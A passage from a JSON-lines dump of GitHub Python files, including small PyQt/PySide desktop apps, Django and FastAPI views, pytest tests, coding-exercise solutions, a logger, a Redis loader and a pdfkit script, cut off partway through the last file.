\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShenruiJin/Strategy","sub_path":"LICENSE.md/CBOE_Rolled_Contracts.py","file_name":"CBOE_Rolled_Contracts.py","file_ext":"py","file_size_in_byte":13899,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"41681692322","text":"import platform\n\nfrom PySide2 import QtWidgets, QtGui, QtCore\n\nimport package.api.task\n\nCOLORS = {False: (235, 64, 52), True: (160, 237, 83)}\n\n\nclass TaskItem(QtWidgets.QListWidgetItem):\n def __init__(self, text, done, list_widget):\n super().__init__(text)\n\n self.list_widget = list_widget\n self.done = done\n self.text = text\n self.setSizeHint(QtCore.QSize(self.sizeHint().width(), 50))\n self.set_background_color()\n self.list_widget.addItem(self)\n \n def toggle_state(self):\n self.done = not self.done\n self.set_background_color()\n package.api.task.set_task_status(content=self.text, done=self.done)\n\n def set_background_color(self):\n color = COLORS.get(self.done)\n self.setBackgroundColor(QtGui.QColor(*color))\n style_sheet = \"QListView::item:selected {background: rgb(\"\n style_sheet += f\"{color[0]}, {color[1]}, {color[2]});\"\n style_sheet += \"color: rgb(0, 0, 0);\"\n style_sheet += \"}\"\n self.list_widget.setStyleSheet(style_sheet)\n\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self, ctx):\n super().__init__()\n\n self.width = 250\n self.height = 0\n self.ctx = ctx\n self.setup_ui()\n self.populate_tasks()\n\n def setup_ui(self):\n self.create_widgets()\n self.create_layouts()\n self.modify_widgets()\n self.add_widgets_to_layouts()\n self.setup_connections()\n self.setup_tray()\n\n def setup_tray(self):\n self.tray = QtWidgets.QSystemTrayIcon()\n\n icon = QtGui.QIcon(self.ctx.get_resource(\"icon.png\"))\n\n self.tray.setIcon(icon)\n self.tray.setVisible(True)\n\n self.tray.activated.connect(self.tray_icon_click)\n\n def create_widgets(self):\n self.lw_tasks = QtWidgets.QListWidget()\n 
self.frm_options = QtWidgets.QFrame()\n self.btn_add = QtWidgets.QPushButton()\n self.btn_clean = QtWidgets.QPushButton()\n self.btn_quit = QtWidgets.QPushButton()\n\n def modify_widgets(self):\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.main_layout.setSpacing(0)\n \n self.setStyleSheet(\"border: none;\")\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)\n \n self.lw_tasks.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.lw_tasks.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n\n self.btn_add.setIcon(QtGui.QIcon(self.ctx.get_resource(\"add.svg\")))\n self.btn_clean.setIcon(QtGui.QIcon(self.ctx.get_resource(\"clean.svg\")))\n self.btn_quit.setIcon(QtGui.QIcon(self.ctx.get_resource(\"close.svg\")))\n\n def create_layouts(self):\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.frm_options_layout = QtWidgets.QHBoxLayout(self.frm_options)\n\n def add_widgets_to_layouts(self):\n self.main_layout.addWidget(self.lw_tasks)\n self.main_layout.addWidget(self.frm_options)\n self.frm_options_layout.addWidget(self.btn_add)\n self.frm_options_layout.addStretch()\n self.frm_options_layout.addWidget(self.btn_clean)\n self.frm_options_layout.addWidget(self.btn_quit)\n\n def setup_connections(self):\n self.btn_add.clicked.connect(self.add_task)\n self.btn_clean.clicked.connect(self.clean_tasks)\n self.btn_quit.clicked.connect(self.close)\n self.lw_tasks.itemClicked.connect(lambda task_item: task_item.toggle_state())\n\n def add_task(self):\n text, ok = QtWidgets.QInputDialog.getText(self, \"Ajouter une tâche\", \"Contenu de la tâche :\")\n if ok:\n package.api.task.add_task(content=text)\n self.populate_tasks()\n\n self.center_under_tray()\n self.do_animation()\n\n def center_under_tray(self):\n tray_x, tray_y, _, _ = self.tray.geometry().getCoords()\n if platform.system() == \"Windows\":\n self.move(tray_x - (self.width / 2), min(tray_y - 200, tray_y - self.get_height()))\n else:\n self.move(tray_x - (self.width / 2), tray_y + 25)\n\n def clean_tasks(self):\n for i in range(self.lw_tasks.count()):\n lw_item = self.lw_tasks.item(i)\n if lw_item.done:\n package.api.task.remove_task(lw_item.text)\n\n self.populate_tasks()\n self.center_under_tray()\n self.do_animation()\n\n def do_animation(self):\n self.anim = QtCore.QPropertyAnimation(self, b\"size\")\n self.anim.setDuration(250)\n self.anim.setEasingCurve(QtCore.QEasingCurve.InOutBack)\n self.anim.setStartValue(QtCore.QSize(self.width, self.height))\n self.anim.setEndValue(QtCore.QSize(self.width, self.get_height()))\n self.anim.start()\n\n def get_height(self):\n self.height = (self.lw_tasks.count() + 2) * 50\n return self.height\n\n def populate_tasks(self):\n self.lw_tasks.clear()\n tasks = package.api.task.get_tasks()\n for task, done in tasks.items():\n TaskItem(text=task, done=done, list_widget=self.lw_tasks)\n\n def tray_icon_click(self):\n self.center_under_tray()\n self.do_animation()\n\n if self.isHidden():\n self.showNormal()\n self.activateWindow()\n else:\n self.hide()\n","repo_name":"ThibH/application-bureau","sub_path":"PyTasks/src/main/python/package/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12890353408","text":"\"\"\"Challenge Question 04!\"\"\"\n\n__author__ = \"730573287\"\n\ndef zip(strs: list[str], ints: list[int]) -> dict[str, int]:\n \"\"\"Takes two lists and creates a dictionary with keys being items 
of the first list and values being items of the second list.\"\"\"\n if len(strs) != len(ints):\n return {}\n \n new_dict: dict[str, int] = {}\n index = 0\n for item in strs:\n new_dict[item] = ints[index]\n index += 1\n \n return new_dict","repo_name":"prm9924/comp110-23s-workspace","sub_path":"lessons/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"26976823598","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound\n#from django.core import serializers\nfrom django.http import JsonResponse\n#from django.contrib import messages\n\nfrom datetime import date\n\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Officer, ExamType, Examination, Checklist, LicenseType\nfrom .forms import ExaminationForm\n\n# Create your views here.\n\n\n@login_required\ndef index(request):\n if request.method == 'POST':\n form = ExaminationForm(request.POST)\n \n if form.is_valid():\n examination_date = form.cleaned_data['examination_date']\n examination_type = form.cleaned_data['examination_type']\n examination_license_type = form.cleaned_data['examination_license_type']\n checklists = Checklist.objects.filter(examination__examination_date=str(examination_date), examination__examination_type=examination_type, examination__examination_license_type=examination_license_type)\n \n if len(checklists) == 0:\n errors = \"No checklists available for the selection\"\n return HttpResponseNotFound(errors)\n # return JsonResponse({'success':False, 'errors': errors})\n else:\n #messages.success(request, \"File found\")\n checklist_files = []\n for checklist in checklists:\n checklist_files.append('/media/'+str(checklist.checklist_file))\n\n return HttpResponse(checklist_files)\n else:\n return JsonResponse({'success': False, 'errors': form.errors})\n\n else: \n collect_new_files()\n form = ExaminationForm()\n return render(request, 'checklist/index.html', {\"form\":form }) \n\ndef collect_new_files():\n import os\n directory_path = \"media/checklist/\"\n for filename in os.listdir(directory_path):\n filepath = os.path.join('checklist/', filename)\n exam_type, license_type = filename[11:12], filename[12:13]\n try:\n examination_type = ExamType.objects.get(exam_type=exam_type)\n license_type = LicenseType.objects.get(license_name=license_type)\n examination_officer = Officer.objects.get(pk=1)\n except:\n pass\n import pdb; pdb.set_trace()\n checklist = Checklist.objects.create(checklist_name=filename, checklist_file=filepath)\n checklist.save()\n examination = Examination.objects.create(examination_date=filename[0:10],passed_candidate=0, failed_candidate=0, absent_candidate=0, traffic_officers = \"Non\", examination_type=examination_type, examination_license_type=license_type, examination_officer=examination_officer, examination_checklist=checklist)\n examination.save()\n\n\n'''\nclass Examination(models.Model):\n examination_date = models.DateField(default=date.today)\n passed_candidate = models.IntegerField(default=0)\n failed_candidate = models.IntegerField(default=0)\n absent_candidate = models.IntegerField(default=0)\n traffic_officers = models.CharField(max_length=200)\n\n examination_type = models.ForeignKey(ExamType, on_delete=models.CASCADE)\n examination_license_type = models.ForeignKey(LicenseType, on_delete=models.CASCADE, blank=True)\n examination_officer = models.ForeignKey(Officer, on_delete=models.CASCADE)\n 
examination_checklist = models.ForeignKey(Checklist, on_delete=models.CASCADE)\n\n def candidates(self):\n return(self.passed_candidate+self.failed_candidate+self.absent_candidate)\n\n def __str__(self):\n return(str(self.examination_date))\n'''\n","repo_name":"sandeeparyal/license_results","sub_path":"checklist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6185886274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sphinx_explorer.property_widget import PropertyWidget, \\\n PropertyItem, \\\n TypeBool, \\\n PropertyModel\n\nimport os\nimport sys\nimport yaml\nimport toml\nfrom qtpy.QtGui import *\nfrom qtpy.QtCore import *\nfrom qtpy.QtWidgets import *\nfrom .di import *\n\nimport platform\n\ntry:\n app = QApplication(sys.argv)\nexcept RuntimeError:\n pass\n\n\nhere = os.path.dirname(__file__)\n\n\ndef test_link():\n settings = \"\"\"\n- a\n- b:\n link: a\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n model.a.set_value(\"test\")\n assert model.a.value == \"test\"\n assert model.b.value == \"test\"\n\n\ndef test_link_format():\n settings = \"\"\"\n- a\n- b\n- c:\n link: ({a}, {b})\n- d:\n link: \"{_default}: {c}\"\n default: def\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n model.a.set_value(\"a\")\n model.b.set_value(\"b\")\n assert model.c.value == \"(a, b)\"\n assert model.d.value == \"def: (a, b)\"\n\n\ndef test_allow_empty():\n settings = \"\"\"\n - a:\n value: \"\"\n allow_empty: no\n default: \"default\"\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n assert model.a.value == \"default\"\n model.a.set_value(\"input\")\n assert model.a.value == \"input\"\n model.a.set_value(\"\")\n assert model.a.value == \"default\"\n\n\ndef test_check_tree():\n settings = \"\"\"\n - \"#group\":\n checkable: yes\n default: yes\n -\n - a\n - b\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n\n assert model.group.a.isEnabled() is True\n\n model.setData(model.group.index(), Qt.Unchecked, Qt.CheckStateRole)\n assert model.group.a.isEnabled() is False\n\n\ndef test_dump():\n settings = \"\"\"\n - \"#* Epub Settings\"\n -\n - epub_cover\n - epub_writing_mode:\n default: horizontal\n - epub_header\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n dump = model.dump()\n assert dump == {'Epub Settings': {'epub_writing_mode': 'horizontal'}}\n\n model.get(\"Epub Settings\").epub_cover.set_value(\"cover\")\n dump = model.dump()\n assert dump == {\n \"Epub Settings\": {\n \"epub_cover\": \"cover\",\n \"epub_writing_mode\": \"horizontal\",\n }\n }\n\n model.clear()\n model.load_settings(yaml.load(settings))\n model.set_values(\n {\"Epub Settings\": {\"epub_cover\": \"cover\"}}\n )\n assert model.get(\"Epub Settings\").epub_cover.value == \"cover\"\n\n flat_dump = model.dump(flat=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n \"epub_writing_mode\": \"horizontal\",\n }\n\n flat_dump = model.dump(flat=True, exclude_default=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n }\n\n flat_dump = model.dump(flat=True, store_none=True, exclude_default=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n \"epub_header\": None,\n }\n\n\ndef test_type():\n settings = \"\"\"\n - a:\n value_type: TypeBool\n default: true\n \"\"\"\n model = PropertyModel()\n 
model.load_settings(yaml.load(settings))\n\n assert model.a.value is True\n\n\nif __name__ == \"__main__\":\n import pytest\n\n pytest.main()\n","repo_name":"pashango2/sphinx-explorer","sub_path":"tests/property_widget/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"19481394144","text":"import sys\n\nsys.stdin = open(\"input_1258.txt\", \"r\")\n\n\n# dfs 를 사용해서 0.0 부터 쭉 훝어 내려오는거야\n# 0 이 아닌 점을 발견하면 그게 해당 왼쪽 코너(left_corner 로 저장) 점이 되고\n# 여기서부터 visited 에 넣어 주고, cnt += 1\n# 여기서는 오른쪽으로만 옮겨 가면서 visited 표시 해주고\n# 다음 수가 0이면 아래 방향으로 바꿔서 타고 내려가면서 visited 처리 해준다\n# 내려가다 다음 수가 0이 아니면 해당 점을 right_point 로 저장해준다\n# 해당 범위 내의 점들을 모두 visited 처리 해준다.\n# 해당 범위의 크기를 size 리스트에 저장한다.\n# size 출력 시 행렬 크기 순서대로 출력\n# 크기가 같으면 행이 작은 순서로 출력\n\n# 이걸 계속 돌려서 cnt 올리면 행렬의 개수가 나오고\n# size 리스트를 출력\n\n# boundary checked?? => 꼭!!!!!!!!!!!\n\ndef find():\n visited = [[0] * n for _ in range(n)]\n cnt = 0\n boxes = []\n for i in range(n):\n for j in range(n):\n if data[i][j] != 0 and not visited[i][j]:\n cnt += 1\n a, b = i, j # 아래에서 변의 길이를 측정할 때 i, j 값이 필요해서 a, b 로 따로 저장\n # 아니면 garo, sero = 0, 0 이라고 하고 밑에서 garo += 1 씩 해줘도 측정가능\n while b + 1 < n and data[a][b + 1] != 0:\n b = b + 1\n while a + 1 < n and data[a + 1][b] != 0:\n a = a + 1\n c, d = a, b\n boxes.append([(c - i + 1) * (d - j + 1), (c - i + 1), (d - j + 1)])\n for p in range(i, c + 1):\n for q in range(j, d + 1):\n visited[p][q] = 1\n for i in range(len(boxes) - 1):\n minbox = i\n for j in range(i + 1, len(boxes)):\n if boxes[j][0] < boxes[minbox][0]:\n minbox = j\n if boxes[j][0] == boxes[minbox][0]:\n if boxes[j][1] < boxes[minbox][1]:\n minbox = j\n boxes[i], boxes[minbox] = boxes[minbox], boxes[i]\n\n result = [cnt]\n for i in range(len(boxes)):\n result.append(boxes[i][1])\n result.append(boxes[i][2])\n return ' '.join(map(str, result))\n\n\nT = int(input())\nfor t in range(T):\n n = int(input())\n data = [list(map(int, input().split())) for _ in range(n)]\n print(\"#{} {}\".format(t + 1, find()))","repo_name":"jhee514/Algorithms","sub_path":"01_class/1258_행렬.py","file_name":"1258_행렬.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31420725110","text":"import os\nimport sys\nimport logging\nimport logging.handlers\nfrom config.settings import logfile_name\n\n\nclass Logger(logging.Logger):\n def __init__(self):\n logger_name = \"elena\" # 模块名称\n level = logging.INFO # 日志记录等级\n logger_file = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../logfile/%s\" % logfile_name)) # 日志文件名\n\n # 创建日志文件\n logging.Logger.__init__(self, logger_file)\n if not os.path.exists(logger_file):\n os.makedirs(os.path.dirname(logger_file))\n\n # 设定日志输出格式\n log_format = logging.Formatter(\"[%(asctime)s] [\" + logger_name\n + \"] [%(levelname)s] %(filename)s [line:%(lineno)d] %(message)s\")\n\n if not sys.stdout.isatty():\n # 判断执行输出流是否是终端,是终端直接显示日志\n try:\n console_handle = logging.StreamHandler()\n console_handle.setLevel(level)\n console_handle.setFormatter(log_format)\n self.addHandler(console_handle)\n except Exception as reason:\n self.error(\"%s\" % reason)\n\n else:\n # 设置log文件\n try:\n file_handle = logging.FileHandler(logger_file)\n file_handle.setLevel(level)\n file_handle.setFormatter(log_format)\n self.addHandler(file_handle)\n except Exception as reason:\n self.error(\"%s\" % reason)\n\n # 设置回滚日志,每个日志最大10M,最多备份1个日志\n 
try:\n handler = logging.handlers.RotatingFileHandler(\n filename=logger_file,\n maxBytes=10 * 1024 * 1024,\n backupCount=1,\n mode='a',\n encoding=None,\n delay=0\n )\n handler.setFormatter(log_format)\n except Exception as reason:\n self.error(\"%s\" % reason)\n else:\n self.addHandler(handler)\n\n\nlogger = Logger()\n","repo_name":"su18/Elena","sub_path":"module/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"33670183862","text":"from bson.objectid import ObjectId\n\n\nclass Vacancy(object):\n \"\"\"A class for storing Project related information\"\"\"\n\n def __init__(self, hh_id=None, vacancy_name=None, url=None, salary_min=0.0,\n salary_max=0.0, currency=None):\n # if vacancy_id is None:\n # self._id = ObjectId()\n # else:\n # self._id = vacancy_id\n self.hh_id = hh_id\n self.vacancy_name = vacancy_name\n self.url = url\n self.salary_min = salary_min\n self.salary_max = salary_max\n self.currency = currency\n\n def get_as_json(self):\n \"\"\" Method returns the JSON representation of the Project object, which can be saved to MongoDB \"\"\"\n return self.__dict__\n\n @staticmethod\n def build_from_json(json_data):\n \"\"\" Method used to build Project objects from JSON data returned from MongoDB \"\"\"\n if json_data is not None:\n try:\n return Vacancy(\n # json_data.get('_id', None),\n json_data['hh_id'],\n json_data['vacancy_name'],\n json_data['url'],\n json_data['salary_min'],\n json_data['salary_max'],\n json_data['currency'])\n except KeyError as e:\n raise Exception(\"Key not found in json_data: {}\".format(e.message))\n else:\n raise Exception(\"No data to create Project from!\")","repo_name":"svyatoslavn1000/collecting_information","sub_path":"task_lesson_3/vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13891361631","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'basicus.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^board/$', 'board.views.board'),\n url(r'^board/(\\d+)/$', 'board.views.article'),\n url(r'^board/write/$', 'board.views.write'),\n url(r'^board/comment/(\\d+)/$', 'board.views.comment'), \n)\n","repo_name":"FiaDot/basicus","sub_path":"basicus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10173741204","text":"# -*- coding: utf-8 -*-\n# pylint: disable=missing-docstring\nfrom __future__ import absolute_import, unicode_literals\n\n# 3rd party imports\nimport pytest\n\n# Project imports\nfrom restible import url_params\n\n\n@pytest.mark.parametrize('data', (\n ({'filter': 'value'}),\n ({'filter': 123}),\n ({'filter': 3.14159}),\n ({\n 'filter1': 'value1',\n 'filter2': 123,\n 'filter3': 3.14159\n })\n))\ndef test_extracts_values_correctly(data):\n parsed = url_params.parse({str(n): str(v) for n, v in data.items()})\n\n assert parsed == 
data\n","repo_name":"novopl/restible","sub_path":"src/test/restible/params/test_parse.py","file_name":"test_parse.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"69890834233","text":"'''\n콜라츠추측\n'''\n'''\n첫번째풀이- answer변수사용 ,두번째풀이 - num 직접사용\n'''\ndef solution(num):\n cnt = 0 \n if num == 1: return 0\n \n while num > 1:\n num = num/2 if num % 2 == 0 else (num*3)+1\n cnt += 1\n\n return cnt if num == 1 and cnt <= 500 else -1","repo_name":"gygy7151/pythonTest","sub_path":"programmers/콜라츠추측.py","file_name":"콜라츠추측.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72606187192","text":"import sys\nfrom turtle import right\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QGridLayout\nfrom PyQt5.QtCore import Qt, QPoint, QRect\nfrom PyQt5.QtGui import QPixmap, QPainter, QBrush\n\ncolors = {0: 'darkgrey', 1: 'yellow', 2: 'darkgreen', 3: 'darkred'}\nqt_colors = [Qt.darkGray, Qt.yellow, Qt.darkGreen, Qt.darkRed]\n\n\nclass MyApp(QWidget):\n def __init__(self):\n super().__init__()\n self.window_width, self.window_height = 1200, 800\n self.setMinimumSize(self.window_width, self.window_height)\n\n self.selected = 0\n\n layout = QHBoxLayout()\n layout.addStretch(1)\n layout.setSpacing(0)\n self.setLayout(layout)\n self.pix = QPixmap(self.rect().size())\n self.pix.fill(Qt.white)\n\n # Buttons\n\n self.btn_0 = QPushButton('Wall', self)\n self.btn_1 = QPushButton('Goal', self)\n self.btn_2 = QPushButton('Dirty', self)\n self.btn_3 = QPushButton('Death', self)\n self.btn_0.setStyleSheet(f\"background-color : {colors[0]}\")\n self.btn_1.setStyleSheet(f\"background-color : {colors[1]}\")\n self.btn_2.setStyleSheet(f\"background-color : {colors[2]}\")\n self.btn_3.setStyleSheet(f\"background-color : {colors[3]}\")\n\n self.buttons = [self.btn_0, self.btn_1, self.btn_2, self.btn_3]\n\n self.btn_0.clicked.connect(lambda ch, i=0: self.genericbutton(i))\n self.btn_1.clicked.connect(lambda ch, i=1: self.genericbutton(i))\n self.btn_2.clicked.connect(lambda ch, i=2: self.genericbutton(i))\n self.btn_3.clicked.connect(lambda ch, i=3: self.genericbutton(i))\n\n self.rightside = QWidget()\n rightsidelayout = QGridLayout()\n rightsidelayout.setSpacing(10)\n rightsidelayout.addWidget(self.btn_0, 0, 0)\n rightsidelayout.addWidget(self.btn_1, 0, 1)\n rightsidelayout.addWidget(self.btn_2, 1, 0)\n rightsidelayout.addWidget(self.btn_3, 1, 1)\n self.rightside.setLayout(rightsidelayout)\n\n self.rightsidewrapper = QWidget()\n rightsidewrapperlayout = QVBoxLayout()\n rightsidelayout.setSpacing(0)\n rightsidewrapperlayout.addWidget(self.rightside)\n rightsidewrapperlayout.addStretch(1)\n self.rightsidewrapper.setLayout(rightsidewrapperlayout)\n\n layout.addWidget(self.rightsidewrapper)\n\n self.begin, self.destination = QPoint(), QPoint()\n\n def genericbutton(self, input):\n print(f'button {input} clicked i guess')\n for index, but in enumerate(self.buttons):\n but.setStyleSheet(f\"background-color : {colors[index]}\")\n\n self.buttons[input].setStyleSheet(\n \"border :5px solid;\" f\"background-color : {colors[input]}\")\n\n self.selected = input\n\n # selected = 4\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.drawPixmap(QPoint(), self.pix)\n if not self.begin.isNull() and not self.destination.isNull():\n rect = QRect(self.begin, self.destination)\n 
painter.drawRect(rect.normalized())\n painter.fillRect(rect.normalized(), QBrush(\n qt_colors[self.selected]))\n # self.update()\n\n def mousePressEvent(self, event):\n if event.buttons() & Qt.LeftButton:\n print(\"Point 1\")\n self.begin = event.pos()\n self.destination = self.begin\n self.update()\n\n def mouseMoveEvent(self, event):\n if event.buttons() & Qt.LeftButton:\n print(\"Point 2\")\n self.destination = event.pos()\n self.update()\n\n def mouseReleaseEvent(self, event):\n print(\"Point 3\")\n if event.button() & Qt.LeftButton:\n rect = QRect(self.begin, self.destination)\n painter = QPainter(self.pix)\n painter.drawRect(rect.normalized())\n painter.fillRect(rect.normalized(), QBrush(\n qt_colors[self.selected]))\n self.begin, self.destination = QPoint(), QPoint()\n\n self.update()\n\n\nif __name__ == \"__main__\":\n # don't auto scale when drag app to a different monitor.\n # QApplication.setAttribute(Qt.HighDpiScaleFactorRoundingPolicy.PassThrough)\n\n app = QApplication(sys.argv)\n app.setStyleSheet(\n \"\"\"\n\t\tQWidget {\n\t\t\tfont-size: 30px;\n\t\t}\n\t\"\"\"\n )\n\n myApp = MyApp()\n myApp.show()\n\n try:\n sys.exit(app.exec_())\n except SystemExit:\n print(\"Closing Window...\")\n","repo_name":"Casteeuwen/Editor","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21623997971","text":"import pandas as pd\nimport pdfkit\npath_wkthmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)\nsv = pd.read_csv('work.csv',index_col=0)\nsv.to_html('docs/test.html')\nPdfFilename='docs/pdfPrintOut.pdf'\npdfkit.from_file('docs/test.html', PdfFilename, configuration=config)\n\n#generating from URL\npdfkit.from_url('https://www.youtube.com/watch?v=Fo7J2dHpMjk','sample1.pdf', configuration=config)\n\n#for multiple\npdfkit.from_url(['google.com', 'geeksforgeeks.org', 'facebook.com'], 'Pavan.pdf')\npdfkit.from_file(['file1.html', 'file2.html'], 'out.pdf')","repo_name":"pavanmaganti9/v1","sub_path":"munging_pdf.py","file_name":"munging_pdf.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26701364820","text":"import sys \n\nimport redis\n\n# Contains functions that stores the mapping from document IDs to URLs (originally in a text document) in redis.\n# The flask application, however, continues to use the mapping from the text document and not redis.\n\nURL_DOCID_PATH = 'ClueWeb12_B13_DocID_To_URL.txt' # Change this path as necessary.\n\n\ndef save_hash(r, n):\n \"\"\"Inserts n rows into redis using xxx as hash keys.\"\"\"\n with open(URL_DOCID_PATH, 'r') as f:\n i = 0\n for line in f:\n if i >= n:\n break\n i += 1\n\n num, url = map(lambda x: x.strip(), line.split(',', 1))\n num = num.split('-', 1)[1] # Strip `clueweb12-` from all keys to save space.\n hash_key, record_num = num.rsplit('-', 1) \n\n r.hset(hash_key, record_num, url)\n\n\ndef save_redis(r, n):\n \"\"\"Inserts n rows into redis.\"\"\"\n with open(URL_DOCID_PATH, 'r') as f:\n i = 0\n for line in f:\n if i >= n:\n break\n i += 1 \n\n num, url = map(lambda x: x.strip(), line.split(',', 1))\n num = num.split('-', 1)[1] # Strip `clueweb12-` from all keys to save space.\n r.set(num, url)\n\ndef reset_redis(r):\n \"\"\"Deletes all keys from Redis.\"\"\"\n keys = r.keys()\n if len(keys) > 0:\n r.delete(*keys)\n\n\nif 
__name__ == '__main__':\n # Gets command line argument for number of rows to insert into redis. Defaults to 5000.\n if len(sys.argv) > 1:\n n = int(sys.argv[1])\n else:\n n = 5000\n\n r = redis.Redis()\n # Compares the memory used by redis with and without hashes.\n for func in [save_redis, save_hash]:\n func(r, n)\n print('dbsize:', r.dbsize())\n for k, v in r.info('Memory').items():\n if k.endswith('human'):\n print(k, v)\n reset_redis(r)\n","repo_name":"muraokamasaki/research_project_a","sub_path":"app/redis_docid_to_url.py","file_name":"redis_docid_to_url.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42458924910","text":"# Import Libraries\nfrom sklearn.metrics import accuracy_score\n# ----------------------------------------------------\n'''\nsklearn.metrics.accuracy_score(y_true, y_pred, normalize=True, sample_weight=None)\n\nnormalizebool, default=True\nIf False, return the number of correctly classified samples. Otherwise, return the fraction of correctly classified samples.\n\n'''\ny_true = ['a', 'b', 'b', 'a', 'b', 'a', 'a', 'b', 'a', 'b']\ny_pred = ['a', 'a', 'b', 'b', 'a', 'b', 'a', 'a', 'a', 'a']\n\n# Calculating Accuracy Score : ((TP + TN) / float(TP + TN + FP + FN))\nAccScore = accuracy_score(y_true, y_pred)\nprint('Accuracy Score is : ', AccScore)\n","repo_name":"ahmedatef1610/scikit-learn-library-for-machine-learning","sub_path":"1.3 Metrics Module/8-accuracy_score.py","file_name":"8-accuracy_score.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17414029537","text":"from fastapi import APIRouter,HTTPException,status, Depends\nfrom blogapp.model import BookSchema, UpdateBookSchema\nfrom fastapi.responses import JSONResponse\nfrom settings.settings import BOOK_COLLECTION_NAME,get_db, get_current_user\nimport json\nfrom bson import ObjectId\nfrom pymongo import errors\nimport pydantic\n\n\npydantic.json.ENCODERS_BY_TYPE[ObjectId]=str\nrouter = APIRouter(\n tags=[\"Book\"],\n prefix=\"/books\"\n)\n\n\n\n@router.get(\"/allbooks\")\ndef getBooks(user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n books = book_col.find()\n if books is None :\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Book with this id does not exist\"\n ) \n all_books = [book for book in books]\n return all_books \n\n@router.get(\"/{id}\")\ndef getBook(id:str,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n book = book_col.find_one(query)\n if book is None :\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Book with this id does not exist\"\n ) \n \n return book\n\n@router.post(\"/\")\ndef addBook(request:BookSchema,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n request_body = request.json()\n request_body_obj = json.loads(request_body)\n # request_body_obj[\"author\"] = \n try:\n print(request_body_obj)\n result = book_col.insert_one(request_body_obj)\n print(result)\n return {\"status\":status.HTTP_201_CREATED,\"details\":result.inserted_id}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Unable to add Book\"\n ) \n \n \n\n@router.delete(\"/{id}\")\ndef delete_book(id,user = 
